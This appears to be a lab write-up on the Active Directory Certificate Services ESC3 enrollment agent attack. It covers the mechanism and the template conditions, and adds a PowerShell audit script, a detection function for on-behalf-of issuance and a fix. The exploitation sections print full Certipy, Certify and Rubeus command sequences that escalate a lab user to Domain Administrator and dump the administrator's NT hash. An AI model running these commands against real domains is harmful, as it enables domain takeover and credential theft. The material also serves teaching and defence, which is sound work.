ESC3
1. What is ESC3
ESC3 exploits a weakness in the Certificate Request Agent (also called Enrollment Agent) mechanism.
ESC3 abuses misconfigured Enrollment Agent templates. It is similar to ESC1 and ESC2, but it relies on a different Extended Key Usage (EKU) and needs extra steps to exploit.
If an attacker obtains a valid enrollment agent certificate, or can use a misconfigured template's permissions to enroll for a new one, they can abuse it to obtain certificates for other users, including highly privileged accounts such as Domain Administrators.
Microsoft documentation sometimes uses the term Enhanced Key Usage for Extended Key Usage, but RFC 5280 section 4.2.1.12 defines the correct name as Extended Key Usage.
1.1. What is an enrollment agent
- Definition: a special certificate capability, the Certificate Request Agent EKU (usually called Enrollment Agent in Microsoft documentation), OID 1.3.6.1.4.1.311.20.2.1.
- Official purpose: lets an administrator act on someone else's behalf. For example, when an employee loses a smart card, an IT administrator verifies the person's identity and then requests a new certificate from the CA on the employee's behalf.
1.2. Workflow
- Get the "letter of introduction": the agent first enrolls for a certificate that carries the Certificate Request Agent EKU.
- Sign on someone's behalf: the agent builds a certificate request (CSR) for the target user and countersigns it with the agent certificate.
- Submit: the agent sends the countersigned request to the CA.
- Issue: after validating the agent certificate, the CA issues a certificate that belongs to the target user.
2. Exploitation
2.1. Requirements:
To exploit ESC3, the CA needs at least two templates that meet the following conditions.
Condition 1: a template that lets a low-privileged user obtain an enrollment agent certificate. Its requirements are essentially the same as for ESC1:
- The CA grants enrollment rights to low-privileged users
- Manager approval is disabled
- No authorized signatures are required
- The template's security descriptor (ACL) is overly permissive and lets low-privileged users enroll
- The template includes the Certificate Request Agent EKU (OID 1.3.6.1.4.1.311.20.2.1), which allows requesting certificates from other templates on behalf of other principals
Condition 2: a template that lets a low-privileged user holding an enrollment agent certificate request certificates on behalf of other users, and that also defines an EKU permitting domain authentication. Specifically:
- The CA grants enrollment rights to low-privileged users
- Manager approval is disabled
- The template schema version is 1, or it is a later version whose issuance requirements specify an Application Policy that includes the Certificate Request Agent EKU
- The template defines an EKU that enables domain authentication (for example Client Authentication)
- No enrollment agent restrictions are configured at the CA level
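The conditions above can be checked directly against the Configuration partition. The script below is an added example written for these notes; it is not Certipy or Certify code. It assumes it runs as an ordinary domain user on a domain-joined host (template objects are readable by Authenticated Users), treats Everyone, Authenticated Users, Domain Users and Domain Computers as "low-privileged", and for the final CA-level check assumes the registry value name EnrollmentAgentRights, which is the value the tools read; that last step only works on the CA host or where its remote registry is reachable.

```powershell
# Added example (not part of the original notes, Certipy or Certify): audit published
# certificate templates for the two ESC3 conditions listed above.
$AgentOid = '1.3.6.1.4.1.311.20.2.1'                       # Certificate Request Agent EKU
$AuthOids = @(
    '1.3.6.1.5.5.7.3.2'                                    # Client Authentication
    '1.3.6.1.4.1.311.20.2.2'                               # Smart Card Logon
    '1.3.6.1.5.2.3.4'                                      # PKINIT Client Authentication
    '2.5.29.37.0'                                          # Any Purpose
)
$EnrollGuid = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55' # Certificate-Enrollment extended right
$PendAll    = 0x2                                          # msPKI-Enrollment-Flag: manager approval required

# Assumption: these SIDs are what "low-privileged" means in this audit
$domainSid = ([System.Security.Principal.NTAccount]"$env:USERDOMAIN\Domain Users").Translate(
    [System.Security.Principal.SecurityIdentifier]).AccountDomainSid.Value
$LowPrivSids = 'S-1-1-0', 'S-1-5-11', "$domainSid-513", "$domainSid-515"

$pks = "CN=Public Key Services,CN=Services,$(([ADSI]'LDAP://RootDSE').configurationNamingContext)"

# Templates actually published on a CA: the certificateTemplates attribute of each Enrollment Services object
$published = @{}
foreach ($ca in ([ADSI]"LDAP://CN=Enrollment Services,$pks").psbase.Children) {
    foreach ($t in $ca.psbase.Properties['certificateTemplates']) {
        $published[$t] = $ca.psbase.Properties['cn'].Value
    }
}

function Test-LowPrivEnroll($entry) {
    # True when a low-privileged SID holds the Enroll right, all extended rights, or GenericAll
    foreach ($ace in $entry.psbase.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($ace.AccessControlType -ne 'Allow' -or $LowPrivSids -notcontains $ace.IdentityReference.Value) { continue }
        $rights   = [int]$ace.ActiveDirectoryRights
        $extended = ($rights -band [int][System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -ne 0
        $all      = ($rights -band [int][System.DirectoryServices.ActiveDirectoryRights]::GenericAll) -ne 0
        if ($all -or ($extended -and ($ace.ObjectType -eq [guid]::Empty -or $ace.ObjectType -eq $EnrollGuid))) {
            return $true
        }
    }
    return $false
}

foreach ($tpl in ([ADSI]"LDAP://CN=Certificate Templates,$pks").psbase.Children) {
    $p    = $tpl.psbase.Properties
    $name = $p['cn'].Value
    if (-not $published.ContainsKey($name)) { continue }         # not enabled on any CA
    $ekus   = @($p['pKIExtendedKeyUsage'].Value | Where-Object { $_ })
    $flags  = [int]$p['msPKI-Enrollment-Flag'].Value
    $raSigs = [int]$p['msPKI-RA-Signature'].Value
    $schema = [int]$p['msPKI-Template-Schema-Version'].Value
    $raPol  = @($p['msPKI-RA-Application-Policies'].Value) -join '`' # newer templates store this as a backtick-delimited string
    $open       = Test-LowPrivEnroll $tpl
    $noApproval = ($flags -band $PendAll) -eq 0

    # Condition 1: a low-privileged user can obtain a Certificate Request Agent certificate
    if (($ekus -contains $AgentOid) -and $open -and $noApproval -and $raSigs -eq 0) {
        "[ESC3 cond.1] $name on $($published[$name]): issues enrollment agent certificates to low-privileged users"
    }
    # Condition 2: the template accepts an agent-signed request and authenticates to the domain
    $authEku      = ($ekus.Count -eq 0) -or [bool]($ekus | Where-Object { $AuthOids -contains $_ })  # no EKU = unrestricted
    $acceptsAgent = ($schema -eq 1) -or ($raSigs -ge 1 -and $raPol -match [regex]::Escape($AgentOid))
    if ($authEku -and $open -and $noApproval -and $acceptsAgent) {
        "[ESC3 cond.2] $name on $($published[$name]): can be requested on behalf of another user with an agent certificate"
    }
}

# CA-level restriction. Assumption: the value name EnrollmentAgentRights; if it is absent,
# no enrollment agent restrictions are configured (Certificate Authority -> Properties -> Enrollment Agents)
certutil -getreg CA\EnrollmentAgentRights 2>&1 | Out-Null
if ($LASTEXITCODE -ne 0) { "[!] No enrollment agent restrictions configured on this CA" }
```

A template reported under condition 1 together with any template reported under condition 2 is the pair this page exploits. The fix is one of: remove the Certificate Request Agent EKU from templates low-privileged users can enroll in, require manager approval or an authorized signature on them, or restrict which agents may enroll on behalf of which users and templates in the CA's Enrollment Agents tab.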
2.2. On Linux
2.2.1. Enumeration
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 41 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Finding issuance policies
[*] Found 29 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'lab-LAB-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'lab-LAB-DC-CA'
[*] Checking web enrollment for CA 'lab-LAB-DC-CA' @ 'LAB-DC.lab.local'
[!] Error checking web enrollment: [Errno 104] Connection reset by peer
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Template Name : ESC3
Display Name : ESC3
Certificate Authorities : lab-LAB-DC-CA
Enabled : True
Client Authentication : False
Enrollment Agent : True
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
SubjectAltRequireEmail
SubjectRequireEmail
SubjectRequireDirectoryPath
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
AutoEnrollment
Private Key Flag : ExportableKey
Extended Key Usage : Certificate Request Agent
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-05-01T17:47:22+00:00
Template Last Modified : 2023-07-05T11:47:23+00:00
Permissions
Enrollment Permissions
Enrollment Rights : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
Object Control Permissions
Owner : LAB.LOCAL\Administrator
Full Control Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Owner Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Dacl Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Property Enroll : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
[+] User Enrollable Principals : LAB.LOCAL\Domain Users
[!] Vulnerabilities
ESC3 : Template has Certificate Request Agent EKU set.
2.2.2. Exploitation
The attacker (attacker@corp.local in the original description; blwasp@lab.local in this lab) requests a certificate from the misconfigured enrollment agent template (or from a template vulnerable to ESC2 through the Any Purpose EKU).
Obtain an enrollment agent certificate
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -ca lab-LAB-DC-CA -target LAB-DC.lab.local -template ESC3
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 73
[*] Successfully requested certificate
[*] Got certificate with UPN 'blwasp@lab.local'
[*] Certificate object SID is 'S-1-5-21-2570265163-3918697770-3667495639-1103'
[*] Saving certificate and private key to 'blwasp.pfx'
[*] Wrote certificate and private key to 'blwasp.pfx'
Use the enrollment agent certificate to request a certificate on behalf of the target user
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -ca lab-LAB-DC-CA -target LAB-DC.lab.local -template User -pfx blwasp.pfx -on-behalf-of 'lab\Administrator'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 79
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@lab.local'
[*] Certificate object SID is 'S-1-5-21-2570265163-3918697770-3667495639-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.22.58
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@lab.local'
[*] Security Extension SID: 'S-1-5-21-2570265163-3918697770-3667495639-500'
[*] Using principal: 'administrator@lab.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe
2.3. On Windows
2.3.1. Enumeration
C:\Users\blwasp\Desktop>.\Certify.exe enum-templates --filter-enabled --filter-vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=lab,DC=local'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.
Template Name : ESC3
Enabled : True
Publishing CAs : LAB-DC.lab.local\lab-LAB-DC-CA
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Certificate Name Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
Enrollment Flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Manager Approval Required : False
Authorized Signatures Required : 0
Extended Key Usage : Certificate Request Agent
Certificate Application Policies : Certificate Request Agent
Vulnerabilities
ESC3 : The template has the 'Certificate Request Agent' EKU.
Permissions
Enrollment Permissions
Enrollment Rights : LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Domain Users S-1-5-21-2570265163-3918697770-3667495639-513
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Object Control Permissions
Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
Write Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Write Dacl : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Write Property : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
2.3.2. Exploitation
C:\Users\blwasp\Desktop>Certify.exe request --ca LAB-DC.lab.local\lab-LAB-DC-CA --template ESC3 --out-file esc3.pfx
[*] Action: Request a certificate
[*] Current user context : LAB\blwasp
[*] No subject name specified, using current context as subject.
[*] Template : ESC3
[*] Subject : CN=Black Wasp, CN=Users, DC=lab, DC=local
[*] Certificate Authority : LAB-DC.lab.local\lab-LAB-DC-CA
[*] CA Response : The certificate has been issued.
[*] Request ID : 80
[*] Certificate (PFX) :
MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0BBwGggCSABIID6DCCBYEwggV9B........
C:\Users\blwasp\Desktop>.\Certify.exe request-agent --ca LAB-DC.lab.local\lab-LAB-DC-CA --template User --target Administrator --agent-pass CertifyIt --agent-pfx MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0BBwGggCSABIID6DCCBYEwggV9B........
[*] Action: Request a certificate (on behalf of another user)
[*] Current user context : LAB\blwasp
[*] Template : User
[*] On Behalf Of : Administrator
[*] Certificate Authority : LAB-DC.lab.local\lab-LAB-DC-CA
[*] CA Response : The certificate has been issued.
[*] Request ID : 84
[*] Certificate (PFX) :
MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0BBwGggC.....
Certify completed in 00:00:04.1585500
C:\Users\blwasp\Desktop>.\Rubeus.exe asktgt /user:administrator /certificate:MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0BBwGggC..... /getcredentials /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Got domain: lab.local
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=lab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'lab.local\administrator'
[*] Using domain controller: fe80::9aa2:4d04:7c43:e9f6%18:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGQjCCBj6gAwIBBaEDAgEWooIFWzCCBVdhggVTMI.........
ServiceName : krbtgt/lab.local
ServiceRealm : LAB.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : LAB.LOCAL
StartTime : 4/20/2026 6:12:27 PM
EndTime : 4/21/2026 4:12:27 AM
RenewTill : 4/27/2026 6:12:27 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : ovIRH0ppPvAL4hObSE/PYA==
ASREP (key) : 41B0BABFF704DA5268EB1A94CB1EEBEF
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 2B576ACBE6BCFDA7294D6BD18041B8FE
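Both the Certipy and the Certify runs above leave the same trace in the CA database: a row whose Requester Name (LAB\blwasp) does not match the User Principal Name in the issued certificate (Administrator@lab.local), preceded by an issuance from the agent template. The function below is an added example for these notes, not code from the original page or from either tool. It assumes the column display names certutil prints ("Request ID", "Requester Name", "User Principal Name", "Certificate Template"); the CSV rows are constructed to mirror request IDs 73 and 79 from the Linux section so the check runs offline.

```powershell
# Added example (not part of the original notes, Certipy or Certify): flag certificates
# the CA issued to someone other than the requester, the trace an ESC3 request leaves.
function Get-OnBehalfOfIssuance {
    param(
        [string[]]$CsvLines,                 # lines of certutil -view csv output
        [string[]]$AgentTemplates = @()      # names of templates that carry the Certificate Request Agent EKU
    )
    foreach ($row in ($CsvLines | ConvertFrom-Csv)) {
        $requester = ($row.'Requester Name' -split '\\')[-1]        # DOMAIN\user -> user
        $issuedTo  = ($row.'User Principal Name' -split '@')[0]     # user@realm -> user (empty for machine certs)
        $reason = $null
        if ($issuedTo -and $requester -and $issuedTo -ne $requester) {
            $reason = "issued to '$issuedTo' but requested by '$requester'"
        } elseif ($AgentTemplates -contains $row.'Certificate Template') {
            $reason = "enrollment agent certificate issued from template '$($row.'Certificate Template')'"
        }
        if ($reason) {
            [pscustomobject]@{
                RequestID = $row.'Request ID'
                Requester = $row.'Requester Name'
                IssuedTo  = $row.'User Principal Name'
                Template  = $row.'Certificate Template'
                Reason    = $reason
            }
        }
    }
}

# On the CA, replace the constructed sample with live data:
#   $lines = certutil -view csv -out "RequestID,RequesterName,UPN,CertificateTemplate"
# Constructed sample rows (not real CA output), modelled on request IDs 73 and 79 above:
$lines = @(
    '"Request ID","Requester Name","User Principal Name","Certificate Template"'
    '"72","LAB\jdoe","jdoe@lab.local","User"'                 # ordinary self-enrollment: not flagged
    '"73","LAB\blwasp","blwasp@lab.local","ESC3"'             # agent certificate issuance
    '"79","LAB\blwasp","Administrator@lab.local","User"'      # on-behalf-of request for Administrator
)
Get-OnBehalfOfIssuance -CsvLines $lines -AgentTemplates 'ESC3' | Format-Table -AutoSize
```

The name comparison assumes the UPN prefix equals the sAMAccountName; where the two legitimately differ, resolve both through AD before comparing, otherwise every such user shows up as a false positive. The same rows are available without the CA database from the CA's security log, where Event ID 4886 records the received request and 4887 the issued certificate with its requester.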